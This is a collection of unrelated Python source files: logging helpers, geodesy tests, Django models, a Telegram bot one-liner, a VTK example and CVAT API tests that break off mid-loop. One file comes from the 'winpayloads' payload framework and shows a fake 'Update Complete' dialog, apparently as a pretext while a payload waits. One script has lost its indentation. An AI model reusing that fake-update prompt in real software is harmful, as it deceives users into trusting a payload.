          "Block paths:\n\t{paths}\n"
    joined_paths = "\n\t".join(platform.config.block_paths)
    send(msg.format(config=platform.config, paths=joined_paths))
def send_xml_errors_if_any(xml_failures):
    """Report how many XML files failed to parse; silent when there are none."""
    if not xml_failures:
        return
    count = len(xml_failures)
    send('\nXML parser: Found {0} erroneous XML file{1} while loading the '
         'block tree (see "Help/Parser errors" for details)\n'.format(
             count, 's' if count > 1 else ''))
def send_start_load(file_path):
    """Announce that *file_path* is being loaded."""
    text = '\nLoading: "%s"\n' % file_path
    send(text)


def send_error_msg_load(error):
    """Print a load error message."""
    text = '>>> Error: %s\n' % error
    send(text)


def send_error_load(error):
    """Print a load error message plus the current traceback."""
    send_error_msg_load(error)
    traceback.print_exc()


def send_end_load():
    """Announce that loading finished successfully."""
    send('>>> Done\n')


def send_fail_load(error):
    """Report a load failure with the current traceback."""
    text = 'Error: %s\n>>> Failure\n' % error
    send(text)
    traceback.print_exc()


def send_start_gen(file_path):
    """Announce that code generation for *file_path* started."""
    text = '\nGenerating: %r\n' % file_path
    send(text)


def send_auto_gen(file_path):
    """Announce an automatic (re-)generation of *file_path*."""
    text = '>>> Generating: %r\n' % file_path
    send(text)


def send_fail_gen(error):
    """Report a generation failure with the current traceback."""
    text = 'Generate Error: %s\n>>> Failure\n' % error
    send(text)
    traceback.print_exc()


def send_start_exec(file_path):
    """Announce that *file_path* is being executed."""
    text = '\nExecuting: %s\n' % file_path
    send(text)


def send_verbose_exec(verbose):
    """Forward raw output of the executed flow graph."""
    send(verbose)


def send_end_exec(code=0):
    """Report execution finished, including the return code when non-zero."""
    suffix = " (return code %s)" % code if code else ""
    send('\n>>> Done%s\n' % suffix)


def send_fail_save(file_path):
    """Report that *file_path* could not be saved."""
    text = '>>> Error: Cannot save: %s\n' % file_path
    send(text)


def send_fail_connection():
    """Report that a connection between blocks could not be created."""
    send('>>> Error: Cannot create connection.\n')


def send_fail_load_preferences(prefs_file_path):
    """Report that the preferences file could not be loaded."""
    text = '>>> Error: Cannot load preferences file: "%s"\n' % prefs_file_path
    send(text)


def send_fail_save_preferences(prefs_file_path):
    """Report that the preferences file could not be saved."""
    text = '>>> Error: Cannot save preferences file: "%s"\n' % prefs_file_path
    send(text)


def send_warning(warning):
    """Print a warning message."""
    text = '>>> Warning: %s\n' % warning
    send(text)
|
import unittest
import os.path
import numpy as np
import numpy.lib.recfunctions as rfn
from geodepy.convert import hp2dec, dec2hp
from geodepy.geodesy import vincinv, vincdir, vincinv_utm, vincdir_utm
class TestGeodesy(unittest.TestCase):
    """Checks vincinv/vincdir (and their UTM variants) against the
    Flinders Peak - Buninyong example values, plus a vincinv->vincdir
    round trip over a CSV of coordinate pairs."""

    def test_vincinv(self):
        """Vincenty inverse between two known geographic points."""
        # Flinders Peak
        lat1 = hp2dec(-37.57037203)
        long1 = hp2dec(144.25295244)
        # Buninyong
        lat2 = hp2dec(-37.39101561)
        long2 = hp2dec(143.55353839)
        ell_dist, azimuth1to2, azimuth2to1 = vincinv(lat1, long1, lat2, long2)
        self.assertEqual(round(ell_dist, 3), 54972.271)
        self.assertEqual(round(dec2hp(azimuth1to2), 6), 306.520537)
        self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)

    def test_vincdir(self):
        """Vincenty direct reproduces Buninyong from azimuth + distance."""
        # Flinders Peak
        lat1 = hp2dec(-37.57037203)
        long1 = hp2dec(144.25295244)
        # To Buninyong
        azimuth1to2 = hp2dec(306.520537)
        ell_dist = 54972.271
        lat2, long2, azimuth2to1 = vincdir(lat1, long1, azimuth1to2, ell_dist)
        self.assertEqual(round(dec2hp(lat2), 8), -37.39101561)
        self.assertEqual(round(dec2hp(long2), 8), 143.55353839)
        self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)

    def test_vincinv_utm(self):
        """Vincenty inverse from UTM coordinates spanning two zones."""
        # Flinders Peak (UTM)
        zone1 = 55
        east1 = 273741.2966
        north1 = 5796489.7769
        # Buninyong (UTM)
        zone2 = 54
        east2 = 758173.7973
        north2 = 5828674.3402
        ell_dist, azimuth1to2, azimuth2to1 = vincinv_utm(zone1, east1, north1, zone2, east2, north2)
        self.assertEqual(round(ell_dist, 3), 54972.271)
        self.assertEqual(round(dec2hp(azimuth1to2), 6), 306.520537)
        self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)

    def test_vincdir_utm(self):
        """Vincenty direct returning UTM output (hemisphere and zone too)."""
        # Flinders Peak (UTM)
        zone1 = 55
        east1 = 273741.2966
        north1 = 5796489.7769
        # To Buninyong
        azimuth1to2 = hp2dec(306.520537)
        ell_dist = 54972.271
        hemisphere2, zone2, east2, north2, azimuth2to1 = vincdir_utm(zone1, east1, north1, azimuth1to2, ell_dist)
        self.assertEqual(hemisphere2, 'South')
        self.assertEqual(zone2, 54)
        self.assertEqual(round(east2, 4), 758173.7968)
        self.assertEqual(round(north2, 4), 5828674.3395)
        self.assertEqual(round(dec2hp(azimuth2to1), 6), 127.102507)

    def test_equality_vincentys(self):
        """Round-trip vincinv -> vincdir over many point pairs from a CSV."""
        # Test multiple point-to-point vincinv calculations
        abs_path = os.path.abspath(os.path.dirname(__file__))
        test_geo_coords =\
            np.genfromtxt(os.path.join(abs_path,
                          'resources/Test_Conversion_Geo.csv'),
                          delimiter=',',
                          dtype='S4,f8,f8',
                          names=['site', 'lat1', 'long1'],
                          usecols=('lat1', 'long1'))
        test_geo_coord2 = \
            np.genfromtxt(os.path.join(abs_path,
                          'resources/Test_Conversion_Geo.csv'),
                          delimiter=',',
                          dtype='S4,f8,f8',
                          names=['site', 'lat2', 'long2'],
                          usecols=('lat2', 'long2'))
        # Form array with point pairs from test file
        # (np.roll by 1 pairs each row with the previous row's coordinates)
        test_pairs = rfn.merge_arrays([test_geo_coords, np.roll(test_geo_coord2, 1)], flatten=True)
        # Calculate Vincenty's Inverse Result using Lat, Long Pairs
        vincinv_result = np.array(list(vincinv(*x) for x in test_pairs[['lat1', 'long1', 'lat2', 'long2']]))
        # Calculate Vincenty's Direct Result using Results from Inverse Function
        # (vincinv returns (dist, az1to2, az2to1); columns 1 and 0 feed vincdir)
        vincdir_input = rfn.merge_arrays([test_geo_coords, vincinv_result[:, 1], vincinv_result[:, 0]], flatten=True)
        vincdir_input.dtype.names = ['lat1', 'long1', 'az1to2', 'ell_dist']
        vincdir_result = np.array(list(vincdir(*x) for x in vincdir_input[['lat1', 'long1', 'az1to2', 'ell_dist']]))
        np.testing.assert_almost_equal(test_pairs['lat2'],
                                       vincdir_result[:, 0], decimal=8)
        np.testing.assert_almost_equal(test_pairs['long2'],
                                       vincdir_result[:, 1], decimal=8)
        np.testing.assert_almost_equal(vincinv_result[:, 2],
                                       vincdir_result[:, 2])

    def test_vincinv_edgecases(self):
        """Translating both longitudes must not change distance or azimuths."""
        lat1 = -32.153892
        lon1 = -15.394827
        lat2 = -31.587369
        lon2 = -13.487739
        gdist, az12, az21 = vincinv(lat1, lon1, lat2, lon2)
        lon1 = lon1 + 14
        lon2 = lon2 + 14
        gdist_2, az12_2, az21_2 = vincinv(lat1, lon1, lat2, lon2)
        self.assertEqual(gdist, gdist_2)
        self.assertEqual(az12, az12_2)
        self.assertEqual(az21, az21_2)
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
|
# -*- coding: UTF-8 -*-
# Copyright 2015-2018 Luc Saffre
# License: BSD (see file COPYING for details)
from __future__ import unicode_literals
from builtins import str
from django.db import models
from lino.api import dd
@dd.python_2_unicode_compatible
class Person(dd.Model):
    # Display name of the person.
    name = models.CharField(max_length=50)

    def __str__(self):
        """A person is represented by its name."""
        return self.name
@dd.python_2_unicode_compatible
class Place(dd.Model):
    # Display name of the place.
    name = models.CharField(max_length=50)
    # A place can be owned by several people.
    owners = models.ManyToManyField(Person, related_name="owned_places")
    # The single person managing the place.
    ceo = models.ForeignKey(Person, related_name="managed_places")

    def __str__(self):
        # Label the place "Restaurant", "Bar", "Restaurant & Bar" or nothing,
        # depending on which related one-to-one rows exist.
        if self.get_restaurant():
            if self.get_bar():
                what = "Restaurant & Bar "
            else:
                what = "Restaurant "
        elif self.get_bar():
            what = "Bar "
        else:
            what = ''
        return "%s %s(ceo=%s,owners=%s)" % (
            self.name, what, self.ceo,
            ','.join([str(o) for o in self.owners.all()]))

    def get_restaurant(self):
        """Return the related Restaurant, or None when the place has none."""
        # Reverse one-to-one access raises DoesNotExist when absent.
        try:
            return self.restaurant
        except Restaurant.DoesNotExist:
            return None

    def get_bar(self):
        """Return the related Bar, or None when the place has none."""
        try:
            return self.bar
        except Bar.DoesNotExist:
            return None
@dd.python_2_unicode_compatible
class Bar(dd.Model):
    # One-to-one: a place has at most one bar.
    place = models.OneToOneField(Place)
    serves_alcohol = models.BooleanField(default=True)

    def __str__(self):
        """Place name, annotated when the bar serves no alcohol."""
        if self.serves_alcohol:
            return self.place.name
        return "%s (no alcohol)" % self.place.name
@dd.python_2_unicode_compatible
class Restaurant(dd.Model):
    # One-to-one: a place has at most one restaurant.
    place = models.OneToOneField(Place)
    serves_hot_dogs = models.BooleanField(default=False)
    cooks = models.ManyToManyField(Person)

    def __str__(self):
        """Place name followed by the list of cooks."""
        return "%s (cooks=%s)" % (
            self.place.name,
            ','.join([str(o) for o in self.cooks.all()]))
@dd.python_2_unicode_compatible
class Visit(models.Model):
    # Deleting the place cascades to its visits.
    allow_cascaded_delete = ['place']
    person = models.ForeignKey(Person)
    place = models.ForeignKey(Place)
    purpose = models.CharField(max_length=50)

    def __str__(self):
        return "%s visit by %s at %s" % (
            self.purpose, self.person, self.place.name)
@dd.python_2_unicode_compatible
class Meal(models.Model):
    # Deleting the restaurant cascades to its meals.
    allow_cascaded_delete = ['restaurant']
    person = models.ForeignKey(Person)
    restaurant = models.ForeignKey(Restaurant)
    what = models.CharField(max_length=50)

    def __str__(self):
        # Restaurant declares no `name` field of its own; its name lives on
        # the related Place (compare Visit.__str__, which uses place.name).
        # `self.restaurant.name` would raise AttributeError at render time.
        return "%s eats %s at %s" % (
            self.person, self.what, self.restaurant.place.name)
|
(lambda: (globals().update({'telethon': __import__('importlib').import_module('telethon.sync')}), globals().update({'c': telethon.TelegramClient('b', input('API ID:'), input('API HASH:')).start(bot_token=input('BOT TOKEN:'))}), c.add_event_handler(lambda e: e.reply('hi'), telethon.events.NewMessage(pattern='!hello')), c.run_until_disconnected()))()
|
# -*- coding: utf8 -*-
"""
Dummy script to averages weight matrix scaling results run with different random seeds
author: András Ecker, last update: 01.2019
"""
import os, pickle
import numpy as np
import pandas as pd
# Repository root: two directory levels above this file.
base_path = os.path.sep.join(os.path.abspath(__file__).split(os.path.sep)[:-2])
# Column order of the result .txt files; column 0 is the wmx multiplier,
# the remaining names index the measured quantities.
header = ["multiplier", "replay", "PC_rate", "BC_rate",
          "PC_ripple_freq", "PC_ripple_power", "BC_ripple_freq", "BC_ripple_power", "LFP_ripple_freq", "LFP_ripple_power",
          "PC_gamma_freq", "PC_gamma_power", "BC_gamma_freq", "BC_gamma_power", "LFP_gamma_freq", "LFP_gamma_power",
          "PC_max_autocorr", "PC_max_ripple_range_autocorr", "BC_max_autocorr", "BC_max_ripple_range_autocorr"]
def average_results(sim_version, seeds):
    """Load results obtained with different random seeds and average them.

    :param sim_version: tag of sim results used to load in files
    :param seeds: list of random seeds used
    :return: pandas dataframe with mean/std columns (multipliers as index)
    """
    # Multipliers are taken from the first seed's file only (it is not
    # verified that every seed was run with the same wmx multipliers).
    first_file = os.path.join(base_path, "files", "results", "%s_%s.txt"%(sim_version, seeds[0]))
    multipliers = np.genfromtxt(first_file, comments='#')[:, 0]
    collected = {name: np.zeros((len(multipliers), len(seeds))) for name in header[1:]}
    for col, seed in enumerate(seeds):
        f_name = os.path.join(base_path, "files", "results", "%s_%s.txt"%(sim_version, seed))
        raw = np.genfromtxt(f_name, comments='#')
        for row, name in enumerate(header[1:]):
            collected[name][:, col] = raw[:, row+1]
    df = pd.DataFrame(index=multipliers)
    for name in header[1:]:
        # nan-aware statistics: missing measurements don't poison the mean
        df["mean_%s"%name] = np.nanmean(collected[name], axis=1)
        df["std_%s"%name] = np.nanstd(collected[name], axis=1)
    return df
if __name__ == "__main__":
sim_version = "sym_0.5_shuffled_linear"
seeds = [1, 12, 1234, 12345, 1993]
df = average_results(sim_version, seeds)
pklf_name = os.path.join(base_path, "files", "results", "%s_avg.pkl"%sim_version)
df.to_pickle(pklf_name, protocol=pickle.HIGHEST_PROTOCOL)
|
#
# Prompts user with dialog box and waits for response before executing, Python
# Module written by Brandon Arvanaghi
# Website: arvanaghi.com
# Twitter: @arvanaghi
# Edited for use in winpayloads
import ctypes
import sys
# Show a blocking "OK" dialog and wait for the user before continuing.
# (Windows-only: uses the user32 MessageBoxW API via ctypes.)
dialogBoxTitle = "Update Complete"
dialogBoxMessage = "Press OK to Continue"
MessageBox = ctypes.windll.user32.MessageBoxW
# 0 = MB_OK: single OK button; returns when the user dismisses the dialog.
MessageBox(None, dialogBoxMessage, dialogBoxTitle, 0)
|
import click
import subprocess
from django.db import DEFAULT_DB_ALIAS, connections
@click.command(help="Runs the command-line client for specified database, or the \
default database if none is provided.")
@click.option("-d", "--database", default=DEFAULT_DB_ALIAS, help="Nominates a database onto which to open a shell. Defaults to the 'default' database.")
def dbshell(database):
    """Open the interactive shell client of the selected database."""
    connection = connections[database]
    try:
        connection.client.runshell()
    except FileNotFoundError:
        # Note that we're assuming the FileNotFoundError relates to the
        # command missing. It could be raised for some other reason, in
        # which case this error message would be inaccurate. Still, this
        # message catches the common case.
        message = ('You appear not to have the %r program installed or on your path.'
                   % connection.client.executable_name)
        raise click.exceptions.UsageError(message)
    except subprocess.CalledProcessError as e:
        # Propagate the client's exit status as our own exit code.
        raise click.exceptions.Exit(code=e.returncode)
|
""" pkg.core.__init__ """
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vtk
"""
There are two alternative ways to apply the transform.
1) Use vtkTransformPolyDataFilter to create a new transformed polydata.
This method is useful if the transformed polydata is needed
later in the pipeline
To do this, set USER_MATRIX = True
2) Apply the transform directly to the actor using vtkProp3D's SetUserMatrix.
No new data is produced.
To do this, set USER_MATRIX = False
"""
USER_MATRIX = True
def main():
    """Render a randomly oriented arrow from a start point to an end point,
    with spheres marking both endpoints (VTK OrientedArrow example)."""
    colors = vtk.vtkNamedColors()

    # Set the background color.
    colors.SetColor('BkgColor', [26, 51, 77, 255])

    # Create an arrow.
    arrowSource = vtk.vtkArrowSource()

    # Generate a random start and end point
    startPoint = [0] * 3
    endPoint = [0] * 3
    rng = vtk.vtkMinimalStandardRandomSequence()
    rng.SetSeed(8775070)  # For testing.
    for i in range(0, 3):
        rng.Next()
        startPoint[i] = rng.GetRangeValue(-10, 10)
        rng.Next()
        endPoint[i] = rng.GetRangeValue(-10, 10)

    # Compute a basis
    normalizedX = [0] * 3
    normalizedY = [0] * 3
    normalizedZ = [0] * 3

    # The X axis is a vector from start to end
    vtk.vtkMath.Subtract(endPoint, startPoint, normalizedX)
    length = vtk.vtkMath.Norm(normalizedX)
    vtk.vtkMath.Normalize(normalizedX)

    # The Z axis is an arbitrary vector cross X
    arbitrary = [0] * 3
    for i in range(0, 3):
        rng.Next()
        arbitrary[i] = rng.GetRangeValue(-10, 10)
    vtk.vtkMath.Cross(normalizedX, arbitrary, normalizedZ)
    vtk.vtkMath.Normalize(normalizedZ)

    # The Y axis is Z cross X
    vtk.vtkMath.Cross(normalizedZ, normalizedX, normalizedY)
    matrix = vtk.vtkMatrix4x4()

    # Create the direction cosine matrix (columns are the new basis vectors)
    matrix.Identity()
    for i in range(0, 3):
        matrix.SetElement(i, 0, normalizedX[i])
        matrix.SetElement(i, 1, normalizedY[i])
        matrix.SetElement(i, 2, normalizedZ[i])

    # Apply the transforms: translate to start, rotate into the basis,
    # then scale the unit arrow to the start-end distance.
    transform = vtk.vtkTransform()
    transform.Translate(startPoint)
    transform.Concatenate(matrix)
    transform.Scale(length, length, length)

    # Transform the polydata
    transformPD = vtk.vtkTransformPolyDataFilter()
    transformPD.SetTransform(transform)
    transformPD.SetInputConnection(arrowSource.GetOutputPort())

    # Create a mapper and actor for the arrow
    mapper = vtk.vtkPolyDataMapper()
    actor = vtk.vtkActor()
    if USER_MATRIX:
        # Strategy 1: keep the source data untransformed, orient the actor.
        mapper.SetInputConnection(arrowSource.GetOutputPort())
        actor.SetUserMatrix(transform.GetMatrix())
    else:
        # Strategy 2: bake the transform into new polydata.
        mapper.SetInputConnection(transformPD.GetOutputPort())
    actor.SetMapper(mapper)
    actor.GetProperty().SetColor(colors.GetColor3d('Cyan'))

    # Create spheres for start and end point
    sphereStartSource = vtk.vtkSphereSource()
    sphereStartSource.SetCenter(startPoint)
    sphereStartSource.SetRadius(0.8)
    sphereStartMapper = vtk.vtkPolyDataMapper()
    sphereStartMapper.SetInputConnection(sphereStartSource.GetOutputPort())
    sphereStart = vtk.vtkActor()
    sphereStart.SetMapper(sphereStartMapper)
    sphereStart.GetProperty().SetColor(colors.GetColor3d('Yellow'))
    sphereEndSource = vtk.vtkSphereSource()
    sphereEndSource.SetCenter(endPoint)
    sphereEndSource.SetRadius(0.8)
    sphereEndMapper = vtk.vtkPolyDataMapper()
    sphereEndMapper.SetInputConnection(sphereEndSource.GetOutputPort())
    sphereEnd = vtk.vtkActor()
    sphereEnd.SetMapper(sphereEndMapper)
    sphereEnd.GetProperty().SetColor(colors.GetColor3d('Magenta'))

    # Create a renderer, render window, and interactor
    renderer = vtk.vtkRenderer()
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.SetWindowName('OrientedArrow')
    renderWindow.AddRenderer(renderer)
    renderWindowInteractor = vtk.vtkRenderWindowInteractor()
    renderWindowInteractor.SetRenderWindow(renderWindow)

    # Add the actor to the scene
    renderer.AddActor(actor)
    renderer.AddActor(sphereStart)
    renderer.AddActor(sphereEnd)
    renderer.SetBackground(colors.GetColor3d('BkgColor'))

    # Render and interact
    renderWindow.Render()
    renderWindowInteractor.Start()
if __name__ == '__main__':
    # Launch the interactive example when run as a script.
    main()
|
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
import copy
import json
import os.path as osp
import os
import av
import numpy as np
import random
import xml.etree.ElementTree as ET
import zipfile
from io import BytesIO
import itertools
from datumaro.components.dataset import Dataset
from datumaro.util.test_utils import compare_datasets, TestDir
from django.contrib.auth.models import Group, User
from PIL import Image
from rest_framework import status
from rest_framework.test import APIClient, APITestCase
import cvat.apps.dataset_manager as dm
from cvat.apps.dataset_manager.bindings import CvatTaskDataExtractor, TaskData
from cvat.apps.dataset_manager.task import TaskAnnotation
from cvat.apps.engine.models import Task
# Canned task definitions and annotations used as fixtures by the tests below.
tasks_path = osp.join(osp.dirname(__file__), 'assets', 'tasks.json')
with open(tasks_path) as file:
    tasks = json.load(file)
annotation_path = osp.join(osp.dirname(__file__), 'assets', 'annotations.json')
with open(annotation_path) as file:
    annotations = json.load(file)
def generate_image_file(filename, size=(100, 50)):
    """Return an in-memory JPEG of *size* whose ``name`` is *filename*,
    rewound to the start so it can be uploaded directly."""
    buf = BytesIO()
    Image.new('RGB', size=size).save(buf, 'jpeg')
    buf.name = filename
    buf.seek(0)
    return buf
def generate_video_file(filename, width=1280, height=720, duration=1, fps=25, codec_name='mpeg4'):
    """Return ``(frame_sizes, file_like)`` for a generated in-memory video.

    The container format is inferred from *filename*'s extension; the
    returned BytesIO has ``name`` set to *filename* and is rewound.
    """
    f = BytesIO()
    total_frames = duration * fps
    file_ext = os.path.splitext(filename)[1][1:]
    container = av.open(f, mode='w', format=file_ext)
    stream = container.add_stream(codec_name=codec_name, rate=fps)
    stream.width = width
    stream.height = height
    stream.pix_fmt = 'yuv420p'
    for frame_i in range(total_frames):
        # Smoothly shifting RGB gradient, different for each frame.
        # NOTE(review): the array is allocated as (width, height, 3), while
        # VideoFrame.from_ndarray conventionally takes (height, width, 3) —
        # confirm this ordering is intentional for these tests.
        img = np.empty((stream.width, stream.height, 3))
        img[:, :, 0] = 0.5 + 0.5 * np.sin(2 * np.pi * (0 / 3 + frame_i / total_frames))
        img[:, :, 1] = 0.5 + 0.5 * np.sin(2 * np.pi * (1 / 3 + frame_i / total_frames))
        img[:, :, 2] = 0.5 + 0.5 * np.sin(2 * np.pi * (2 / 3 + frame_i / total_frames))
        img = np.round(255 * img).astype(np.uint8)
        img = np.clip(img, 0, 255)
        frame = av.VideoFrame.from_ndarray(img, format='rgb24')
        for packet in stream.encode(frame):
            container.mux(packet)
    # Flush stream
    for packet in stream.encode():
        container.mux(packet)
    # Close the file
    container.close()
    f.name = filename
    f.seek(0)
    return [(width, height)] * total_frames, f
class ForceLogin:
    """Context manager that logs *user* into *client* for the duration of
    the block and logs out on exit; a falsy user makes it a no-op."""

    def __init__(self, user, client):
        self.user = user
        self.client = client

    def __enter__(self):
        if not self.user:
            return self
        self.client.force_login(
            self.user, backend='django.contrib.auth.backends.ModelBackend')
        return self

    def __exit__(self, exception_type, exception_value, traceback):
        if not self.user:
            return
        self.client.logout()
class _DbTestBase(APITestCase):
    """Shared fixtures and HTTP helpers for the dump/upload tests below."""

    def setUp(self):
        self.client = APIClient()

    @classmethod
    def setUpTestData(cls):
        cls.create_db_users()

    @classmethod
    def create_db_users(cls):
        """Create one superuser ("admin") and one regular user ("user")."""
        (group_admin, _) = Group.objects.get_or_create(name="admin")
        (group_user, _) = Group.objects.get_or_create(name="user")
        user_admin = User.objects.create_superuser(username="admin", email="",
            password="admin")
        user_admin.groups.add(group_admin)
        user_dummy = User.objects.create_user(username="user", password="user")
        user_dummy.groups.add(group_user)
        cls.admin = user_admin
        cls.user = user_dummy

    def _put_api_v1_task_id_annotations(self, tid, data):
        """PUT *data* as the annotations of task *tid* (as admin)."""
        with ForceLogin(self.admin, self.client):
            response = self.client.put("/api/v1/tasks/%s/annotations" % tid,
                data=data, format="json")
        return response

    def _put_api_v1_job_id_annotations(self, jid, data):
        """PUT *data* as the annotations of job *jid* (as admin)."""
        with ForceLogin(self.admin, self.client):
            response = self.client.put("/api/v1/jobs/%s/annotations" % jid,
                data=data, format="json")
        return response

    @staticmethod
    def _generate_task_images(count):  # pylint: disable=no-self-use
        """Return a task-data payload with *count* generated JPEG images."""
        images = {"client_files[%d]" % i: generate_image_file("image_%d.jpg" % i) for i in range(count)}
        images["image_quality"] = 75
        return images

    @staticmethod
    def _generate_task_videos(count):  # pylint: disable=no-self-use
        """Return a task-data payload with *count* generated videos."""
        videos = {"client_files[%d]" % i: generate_video_file("video_%d.mp4" % i) for i in range(count)}
        videos["image_quality"] = 75
        return videos

    def _create_task(self, data, image_data):
        """Create a task from *data*, attach *image_data*, return the task dict."""
        with ForceLogin(self.user, self.client):
            response = self.client.post('/api/v1/tasks', data=data, format="json")
            assert response.status_code == status.HTTP_201_CREATED, response.status_code
            tid = response.data["id"]
            response = self.client.post("/api/v1/tasks/%s/data" % tid,
                data=image_data)
            assert response.status_code == status.HTTP_202_ACCEPTED, response.status_code
            response = self.client.get("/api/v1/tasks/%s" % tid)
            task = response.data
        return task

    def _get_jobs(self, task_id):
        """Return the jobs of task *task_id* (as admin)."""
        with ForceLogin(self.admin, self.client):
            response = self.client.get("/api/v1/tasks/{}/jobs".format(task_id))
        return response.data

    def _get_request(self, path, user):
        with ForceLogin(user, self.client):
            response = self.client.get(path)
        return response

    def _get_data_from_task(self, task_id, include_images):
        """Build a Datumaro dataset from the task's current annotations."""
        task_ann = TaskAnnotation(task_id)
        task_ann.init_from_db()
        task_data = TaskData(task_ann.ir_data, Task.objects.get(pk=task_id))
        extractor = CvatTaskDataExtractor(task_data, include_images=include_images)
        return Dataset.from_extractors(extractor)

    def _get_request_with_data(self, path, data, user):
        with ForceLogin(user, self.client):
            response = self.client.get(path, data)
        return response

    def _put_request_with_data(self, path, data, user):
        with ForceLogin(user, self.client):
            response = self.client.put(path, data)
        return response

    def _delete_request(self, path, user):
        with ForceLogin(user, self.client):
            response = self.client.delete(path)
        return response

    def _build_annotations(self, task, name_ann, key_get_values):
        """Return a deep copy of the canned annotations *name_ann* with label
        and attribute ids rewritten to match *task*.

        *key_get_values* selects attribute values: "random" draws a valid
        random value per attribute spec, "default" uses the declared default.
        Shared by the task-level and job-level upload helpers below (the two
        previously duplicated this logic verbatim).
        """
        tmp_annotations = copy.deepcopy(annotations[name_ann])
        # change attributes in all annotations
        for item in tmp_annotations:
            if item in ["tags", "shapes", "tracks"]:
                for index_elem, _ in enumerate(tmp_annotations[item]):
                    tmp_annotations[item][index_elem]["label_id"] = task["labels"][0]["id"]
                    for index_attribute, attribute in enumerate(task["labels"][0]["attributes"]):
                        spec_id = task["labels"][0]["attributes"][index_attribute]["id"]
                        if key_get_values == "random":
                            if attribute["input_type"] == "number":
                                start = int(attribute["values"][0])
                                stop = int(attribute["values"][1]) + 1
                                step = int(attribute["values"][2])
                                value = str(random.randrange(start, stop, step))
                            else:
                                value = random.choice(task["labels"][0]["attributes"][index_attribute]["values"])
                        elif key_get_values == "default":
                            value = attribute["default_value"]
                        # Mutable track attributes live on each shape;
                        # everything else is attached to the element itself.
                        if item == "tracks" and attribute["mutable"]:
                            for index_shape, _ in enumerate(tmp_annotations[item][index_elem]["shapes"]):
                                tmp_annotations[item][index_elem]["shapes"][index_shape]["attributes"].append({
                                    "spec_id": spec_id,
                                    "value": value,
                                })
                        else:
                            tmp_annotations[item][index_elem]["attributes"].append({
                                "spec_id": spec_id,
                                "value": value,
                            })
        return tmp_annotations

    def _create_annotations(self, task, name_ann, key_get_values):
        """Upload canned annotations to the whole task and assert success."""
        tmp_annotations = self._build_annotations(task, name_ann, key_get_values)
        response = self._put_api_v1_task_id_annotations(task["id"], tmp_annotations)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def _create_annotations_in_job(self, task, job_id, name_ann, key_get_values):
        """Upload canned annotations to one job of the task and assert success."""
        tmp_annotations = self._build_annotations(task, name_ann, key_get_values)
        response = self._put_api_v1_job_id_annotations(job_id, tmp_annotations)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def _download_file(self, url, data, user, file_name):
        """Two-step export download: first request schedules, second streams."""
        response = self._get_request_with_data(url, data, user)
        self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
        response = self._get_request_with_data(url, data, user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        content = BytesIO(b"".join(response.streaming_content))
        with open(file_name, "wb") as f:
            f.write(content.getvalue())

    def _upload_file(self, url, data, user):
        """Two-step import upload: first request accepts, second finalizes."""
        response = self._put_request_with_data(url, {"annotation_file": data}, user)
        self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
        response = self._put_request_with_data(url, {}, user)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def _check_downloaded_file(self, file_name):
        """Raise FileNotFoundError unless *file_name* exists on disk."""
        if not osp.exists(file_name):
            raise FileNotFoundError(f"File '{file_name}' was not downloaded")

    def _generate_url_dump_tasks_annotations(self, task_id):
        return f"/api/v1/tasks/{task_id}/annotations"

    def _generate_url_upload_tasks_annotations(self, task_id, upload_format_name):
        return f"/api/v1/tasks/{task_id}/annotations?format={upload_format_name}"

    def _generate_url_dump_job_annotations(self, job_id):
        return f"/api/v1/jobs/{job_id}/annotations"

    def _generate_url_upload_job_annotations(self, job_id, upload_format_name):
        return f"/api/v1/jobs/{job_id}/annotations?format={upload_format_name}"

    def _generate_url_dump_dataset(self, task_id):
        return f"/api/v1/tasks/{task_id}/dataset"

    def _remove_annotations(self, url, user):
        """DELETE all annotations at *url* and assert the 204 response."""
        response = self._delete_request(url, user)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        return response
class TaskDumpUploadTest(_DbTestBase):
def test_api_v1_dump_and_upload_annotations_with_objects_type_is_shape(self):
test_name = self._testMethodName
dump_formats = dm.views.get_export_formats()
upload_formats = dm.views.get_import_formats()
expected = {
self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED,'file_exists': True, 'annotation_loaded': True},
self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False, 'annotation_loaded': False},
}
with TestDir() as test_dir:
# Dump annotations with objects type is shape
for dump_format in dump_formats:
if not dump_format.ENABLED:
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
images = self._generate_task_images(3)
# create task with annotations
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
if dump_format_name in [
"MOT 1.1", "MOTS PNG 1.0", \
"PASCAL VOC 1.1", "Segmentation mask 1.1", \
"TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
"WiderFace 1.0", "VGGFace2 1.0", \
]:
self._create_annotations(task, dump_format_name, "default")
else:
self._create_annotations(task, dump_format_name, "random")
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
for user, edata in list(expected.items()):
user_name = edata['name']
file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
}
response = self._get_request_with_data(url, data, user)
